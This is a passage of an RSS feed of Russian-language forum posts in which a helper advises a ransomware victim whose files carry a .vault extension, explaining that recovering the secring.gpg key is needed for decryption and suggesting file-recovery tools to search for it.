			вообще чудеса с ВАУЛТом случаются, хотя и редко. <br />впервые я столкнулся с ним год назад (тогда это был не VAULT, <noindex><a href="http://chklst.ru/forum/discussion/532/bat-encoder" target="_blank" rel="nofollow"><B>а бат.энкодер</B></a></noindex>, но с таким же принципом работы и методом шифрования), когда необходимо было восстановить множество зашифрованных файлов на локальном и сетевых дисках.<br />тогда расширения файлов были doc.gpg. xls.gpg.<br />оказалось, что файлы не были зашифрованы, а всего лишь переименованы, при том, что private.key и unique.key были зашифрованы по настоящему.<br /><br />но больше так не везло уже. <img src="http://forum.esetnod32.ru/upload/main/smiles/5/icon_smile.gif" border="0" data-code=":)" data-definition="SD" alt=":)" style="width:16px;height:16px;" title="С улыбкой" class="bx-smile" /> <br />
			<i>21.08.2015 16:08:35, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum35/topic13305/message87370/</link>
			<guid>http://forum.esetnod32.ru/messages/forum35/topic13305/message87370/</guid>
			<pubDate>Fri, 21 Aug 2015 16:08:35 +0300</pubDate>
			<category>Шифровальщики файлов и подбор дешифраторов</category>
		</item>
		<item>
			<title>файлы зашифрованы с расширением .vault</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum35/topic13305/message87367/">файлы зашифрованы с расширением .vault</a></b> <i>bat encoder /CryptVault</i> в форуме <a href="http://forum.esetnod32.ru/forum35/">Шифровальщики файлов и подбор дешифраторов</a>. <br />
			<br />====quote====<br /><a class="blog-p-user-name" id="bp_17ZTiXZO" href="/user/22/" bx-tooltip-user-id="22">santy</a> написал:<br />пробуйте искать testdisk-ом, getdataback, r-studio, recula<br />причем, программы лучше устанавливать и запускать с другого диска, <br />а не там где был запуск шифратора.<br /><br />вторая и третья программы - платные.<br />не факт что найдется ключ, по ничто не мешает проверить... а вдруг..., он там в темпе среди удаленных лежит и ждет вас, чтобы помочь с расшифровкой.<br />=============<br />Спасибо))) Да, 4ый день/ночь/день/ночь/....верю в то, что она меня ждет))))) ищу с помощью &nbsp;recula <br />
			<i>21.08.2015 16:01:34, Оксана Дубовицкая.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum35/topic13305/message87367/</link>
			<guid>http://forum.esetnod32.ru/messages/forum35/topic13305/message87367/</guid>
			<pubDate>Fri, 21 Aug 2015 16:01:34 +0300</pubDate>
			<category>Шифровальщики файлов и подбор дешифраторов</category>
		</item>
		<item>
			<title>файлы зашифрованы с расширением .vault</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum35/topic13305/message87363/">файлы зашифрованы с расширением .vault</a></b> <i>bat encoder /CryptVault</i> в форуме <a href="http://forum.esetnod32.ru/forum35/">Шифровальщики файлов и подбор дешифраторов</a>. <br />
			пробуйте искать testdisk-ом, getdataback, r-studio, recula<br />причем, программы лучше устанавливать и запускать с другого диска, <br />а не там где был запуск шифратора.<br /><br />вторая и третья программы - платные.<br />не факт что найдется ключ, по ничто не мешает проверить... а вдруг..., он там в темпе среди удаленных лежит и ждет вас, чтобы помочь с расшифровкой. <br />
			<i>21.08.2015 15:50:05, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum35/topic13305/message87363/</link>
			<guid>http://forum.esetnod32.ru/messages/forum35/topic13305/message87363/</guid>
			<pubDate>Fri, 21 Aug 2015 15:50:05 +0300</pubDate>
			<category>Шифровальщики файлов и подбор дешифраторов</category>
		</item>
		<item>
			<title>файлы зашифрованы с расширением .vault</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum35/topic13305/message87358/">файлы зашифрованы с расширением .vault</a></b> <i>bat encoder /CryptVault</i> в форуме <a href="http://forum.esetnod32.ru/forum35/">Шифровальщики файлов и подбор дешифраторов</a>. <br />
			Ок. Есть смысл искать в удаленных файлах? Какой программой я смогу его найти? &nbsp; <br />
			<i>21.08.2015 14:43:38, Оксана Дубовицкая.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum35/topic13305/message87358/</link>
			<guid>http://forum.esetnod32.ru/messages/forum35/topic13305/message87358/</guid>
			<pubDate>Fri, 21 Aug 2015 14:43:38 +0300</pubDate>
			<category>Шифровальщики файлов и подбор дешифраторов</category>
		</item>
		<item>
			<title>файлы зашифрованы с расширением .vault</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum35/topic13305/message87357/">файлы зашифрованы с расширением .vault</a></b> <i>bat encoder /CryptVault</i> в форуме <a href="http://forum.esetnod32.ru/forum35/">Шифровальщики файлов и подбор дешифраторов</a>. <br />
			расшифровать документы можно , если сможете восстановить secring.gpg<br />в противном случае помогут только мошенники, но за ваши деньги. <br />
			<i>21.08.2015 14:29:55, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum35/topic13305/message87357/</link>
			<guid>http://forum.esetnod32.ru/messages/forum35/topic13305/message87357/</guid>
			<pubDate>Fri, 21 Aug 2015 14:29:55 +0300</pubDate>
			<category>Шифровальщики файлов и подбор дешифраторов</category>
		</item>
		<item>
			<title>файлы зашифрованы с расширением .vault</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum35/topic13305/message87355/">файлы зашифрованы с расширением .vault</a></b> <i>bat encoder /CryptVault</i> в форуме <a href="http://forum.esetnod32.ru/forum35/">Шифровальщики файлов и подбор дешифраторов</a>. <br />
			<br />====quote====<br /><a class="blog-p-user-name" id="bp_pkMgWXnz" href="/user/22/" bx-tooltip-user-id="22">santy</a> написал:<br /><br />====quote====<br /> Оксана Дубовицкая &nbsp; написал:<br />Еще есть какой-то ddae25beb5b57d6e .hta<br />=============<br />это файл заставки, которая всплывает после завершения шифрования, на результат расшифровки он не влияет.<br />=============<br />И? Я перечитала весь форум. Пошел день 4й. &nbsp;Есть ли возможность восстановить все? <br />
			<i>21.08.2015 14:01:25, Оксана Дубовицкая.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum35/topic13305/message87355/</link>
			<guid>http://forum.esetnod32.ru/messages/forum35/topic13305/message87355/</guid>
			<pubDate>Fri, 21 Aug 2015 14:01:25 +0300</pubDate>
			<category>Шифровальщики файлов и подбор дешифраторов</category>
		</item>
		<item>
			<title>файлы зашифрованы с расширением .vault</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum35/topic13305/message87350/">файлы зашифрованы с расширением .vault</a></b> <i>bat encoder /CryptVault</i> в форуме <a href="http://forum.esetnod32.ru/forum35/">Шифровальщики файлов и подбор дешифраторов</a>. <br />
			<br />====quote====<br /><a class="blog-p-user-name" id="bp_1BBE6PHi" href="/user/21675/" bx-tooltip-user-id="21675">Оксана Дубовицкая</a> написал:<br />Еще есть какой-то ddae25beb5b57d6e .hta<br />=============<br />это файл заставки, которая всплывает после завершения шифрования, на результат расшифровки он не влияет. <br />
			<i>21.08.2015 13:03:17, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum35/topic13305/message87350/</link>
			<guid>http://forum.esetnod32.ru/messages/forum35/topic13305/message87350/</guid>
			<pubDate>Fri, 21 Aug 2015 13:03:17 +0300</pubDate>
			<category>Шифровальщики файлов и подбор дешифраторов</category>
		</item>
		<item>
			<title>файлы зашифрованы с расширением .vault</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum35/topic13305/message87345/">файлы зашифрованы с расширением .vault</a></b> <i>bat encoder /CryptVault</i> в форуме <a href="http://forum.esetnod32.ru/forum35/">Шифровальщики файлов и подбор дешифраторов</a>. <br />
			<br />====quote====<br /><a class="blog-p-user-name" id="bp_AQzCgFC2" href="/user/22/" bx-tooltip-user-id="22">santy</a> написал:<br />Оксана, когда было шифрование?<br />по проблеме с расшифровкой документов прочитайте <br />ВАУЛТ. что делать?<br /> <noindex><a href="http://chklst.ru/forum/discussion/1481/vault-chto-delat" target="_blank" rel="nofollow">http://chklst.ru/forum/discussion/1481/vault-chto-delat</a></noindex> <br />=============<br />Добрый день! Шифрование было 17.08.15 с 16.00-17.00. Я почитала &quot;Что делать&quot;.<br />Установила программу для восстановления удаленных файлов, чтобы найти файлы указанные в &quot;Что делать&quot;, но либо я не там смотрю, либо их нет. Не сильна я в этих вопросах. <br /> В общем, вопрос остался открытым. Еще есть какой-то ddae25beb5b57d6e .hta <br />
			<i>21.08.2015 12:23:42, Оксана Дубовицкая.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum35/topic13305/message87345/</link>
			<guid>http://forum.esetnod32.ru/messages/forum35/topic13305/message87345/</guid>
			<pubDate>Fri, 21 Aug 2015 12:23:42 +0300</pubDate>
			<category>Шифровальщики файлов и подбор дешифраторов</category>
		</item>
	</channel>
</rss>
